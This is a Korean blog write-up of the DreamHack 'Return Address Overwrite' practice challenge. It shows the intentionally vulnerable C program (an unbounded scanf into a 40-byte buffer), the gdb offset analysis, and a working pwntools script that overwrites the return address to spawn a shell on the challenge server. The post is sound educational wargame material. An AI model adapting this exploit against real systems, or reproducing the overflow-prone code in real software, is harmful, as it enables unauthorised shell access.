이 영역을 누르면 첫 페이지로 이동
포렌식 & 개발 이야기 - Forensics & Development 블로그의 첫 페이지로 이동

포렌식 & 개발 이야기 - Forensics & Development

페이지 맨 위로 올라가기

포렌식 & 개발 이야기 - Forensics & Development

Pental - Forensics / iOS / Windows / Android / Kakaotalk / Telegram / Etc

[DreamHack] Return Address Overwrite

  • 2024.07.09 00:18
  • Best of Best
글 작성자: pental

난 포렌식 하는 사람인데 포너블을,,,,? 

바이너리 파일을 다운로드 받아, C코드와 바이너리를 확인한다.

// Name: rao.c
// Compile: gcc -o rao rao.c -fno-stack-protector -no-pie

#include <stdio.h>
#include <unistd.h>

void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}

void get_shell() {
  char *cmd = "/bin/sh";
  char *args[] = {cmd, NULL};

  execve(cmd, args, NULL);
}

int main() {
  char buf[0x28];

  init();

  printf("Input: ");
  scanf("%s", buf);

  return 0;
}

단순한 구조이다. buf에는 0x28 크기를 가진다. 즉 char buf[40]; 이라는 말이며, 당연하게도 40개 이상의 문자를 입력하면 BOF 취약점이 펑펑 터진다~~

gdb를 통해서 봐보자~

main 함수의 어셈블리를 확인해보면 main+4에서 rsp에 0x30 을 통해서 buffer를 설정한다.

그 후 main+54에서 buffer에 값을 담는다. 그리고 leave하고 ㅌㅌ하면서 프로그램은 종료된다.

main+35를 확인하면 rax, [rbp-0x30] 는, scanf에서 buf와 0x30 만큼 떨어져 있다. 이제 스택 SFP 의 크기인 0x8만큼을 추가하면 0x38 만큼의 길이를 넣으면, return 주소에 직접 접근 할 수 있다.

그럼 get_shell()의 함수 주소를 알고 있다면 return Address에 get_shell()의 함수 값을 넣어주면 get_shell()을 호출 할 수 있다.

 

gdb 에서 p get_shell 을 하면 get_shell의 주소를 확인 할수 있으며 여기서는 0x4006aa 를 나타내고 있다.

그럼 (Dummy)0x38 + (get_shell_address)0x8 를 넣어주면 취약점이 펑펑 터진다~~

get_shell_address를 리틀엔디안으로 바꿔주면 \xaa\x06\x40\x00\x00\x00\x00\x00 인데 이거 만들기 귀찮잖아~

pwntools의 p64로 감싸주면 된다~ 최종적인 페이로드를 작성하면

from pwn import *
p = remote("host3.dreamhack.games", 10561)
payload = b"A" * 0x30
payload += b"B" * 0x8 # rbp + 8
payload += p64(0x4006aa)
# payload += b"\xaa\x06\x40\x00\x00\x00\x00\x00" # Payload

p.recvuntil("Input: ")
p.sendline(payload)
p.interactive()

A를 0x30 넣고, return address까지 가는 rbp + 8 에 B를 8개 넣어준다.

리틀엔디안으로 바꾸기 귀찮은 0x4006aa를 p64로 감싸주면 바로 쉘이 따진다.

이상 포렌식만 하던 사람이 포너블 1Day1Pwn 하기.

저작자표시 비영리 (새창열림)

'Best of Best' 카테고리의 다른 글

[DreamHack] cmd_center  (0) 2024.07.11
[DreamHack] out_of_bound  (0) 2024.07.11
[BOB 교육] 실무로 알아보는 개인정보 안전성 확보조치와 유출사고 대응 - 김두민 멘토님  (0) 2024.07.03
[BOB 교육] 금융보안 인프라 - 이현정 멘토님  (0) 2024.07.03
[BOB 교육] 개인정보의 개념 및 개인정보 보호법 제개정 연혁 - 주영선 멘토님  (0) 2024.07.03

댓글

이 글 공유하기

  • 구독하기

    구독하기

  • 카카오톡

    카카오톡

  • 라인

    라인

  • 트위터

    트위터

  • Facebook

    Facebook

  • 카카오스토리

    카카오스토리

  • 밴드

    밴드

  • 네이버 블로그

    네이버 블로그

  • Pocket

    Pocket

  • Evernote

    Evernote

다른 글

  • [DreamHack] cmd_center

    [DreamHack] cmd_center

    2024.07.11
  • [DreamHack] out_of_bound

    [DreamHack] out_of_bound

    2024.07.11
  • [BOB 교육] 실무로 알아보는 개인정보 안전성 확보조치와 유출사고 대응 - 김두민 멘토님

    [BOB 교육] 실무로 알아보는 개인정보 안전성 확보조치와 유출사고 대응 - 김두민 멘토님

    2024.07.03
  • [BOB 교육] 금융보안 인프라 - 이현정 멘토님

    [BOB 교육] 금융보안 인프라 - 이현정 멘토님

    2024.07.03
다른 글 더 둘러보기

정보

포렌식 & 개발 이야기 - Forensics & Development 블로그의 첫 페이지로 이동

포렌식 & 개발 이야기 - Forensics & Development

  • 포렌식 & 개발 이야기 - Forensics & Development의 첫 페이지로 이동

검색

메뉴

  • 홈
  • 태그
  • 미디어로그
  • 위치로그
  • 방명록

카테고리

  • Category (437) N
    • Forensics (104)
      • Magnet AXIOM (28)
      • Digital Forensics Informati.. (9)
      • Iphone Forensics (23)
      • DFC (7)
      • 디지털포렌식전문가2급 자격증 (10)
      • FTK ACE 자격증 (7)
    • 이것저것 (7)
      • Ubuntu (6)
      • 디스코드 봇 (4)
      • Volatility GUI (2)
    • CTF (32)
      • NEWSECU (14)
      • CTF-d (5)
      • Puzzel - Network Forensics (2)
      • Security Traps (2)
      • system32.kr (5)
      • HMCTF (4)
    • Programming (246) N
      • C (10)
      • Python (11)
      • 백준 (192) N
      • 프로그래머스 (32)
    • 그냥 개발 및 잡담 (16)
      • Docker (2)
      • Google Cloud (3)
      • OS 개발 (3)
    • Best of Best (20)

최근 글

인기 글

댓글

공지사항

아카이브

태그

  • axiom
  • 파이썬
  • pental
  • 디지털포렌식
  • 포렌식
  • 프로그래머스
  • 백준
  • Forensics
  • 전체 보기…

정보

pental의 포렌식 & 개발 이야기 - Forensics & Development

포렌식 & 개발 이야기 - Forensics & Development

pental

블로그 구독하기

  • 구독하기
  • RSS 피드

방문자

  • 전체 방문자
  • 오늘
  • 어제

티스토리

  • 티스토리 홈
  • 이 블로그 관리하기
  • 글쓰기
Powered by Tistory / Kakao. Copyright © pental.

티스토리툴바